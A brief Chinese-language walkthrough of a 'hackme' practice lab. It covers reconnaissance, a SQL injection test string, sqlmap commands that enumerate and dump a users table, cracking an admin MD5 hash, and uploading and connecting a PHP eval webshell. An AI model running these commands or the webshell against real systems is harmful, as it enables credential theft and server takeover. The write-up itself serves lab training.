hackme靶场攻略
1.打开kali虚拟机和hackme靶机,都用nat模式连接
2.用kali扫描hackme靶机的ip
3.外部浏览器访问靶机IP
4.运用kali dirb命令扫描敏感文件
5.注册用户,登录
6.进入首页,发现是一个查询页面,可能存在sql注入
7.判断是否存在sql注入
windows
windows' and 1=2#
8.bp抓搜索的包
将抓到的包保存成一个文件,在windows后面加一个*,说明这里是注入点
9.kali中使用sqlmap工具
爆破库名
sqlmap -r '1.txt' --current-db
爆破表名
sqlmap -r '1.txt' -D webapphacking --tables
打印‘users’表
sqlmap -r '1.txt' -D webapphacking -T users --dump
发现有一个超级管理员用户,密码md5解密
10.登录超级管理员用户,发现文件上传
11.上传一句话木马
<?php @eval($_POST['cmd']);?>
12.访问uploads目录下,发现上传的木马
13.蚁剑连接
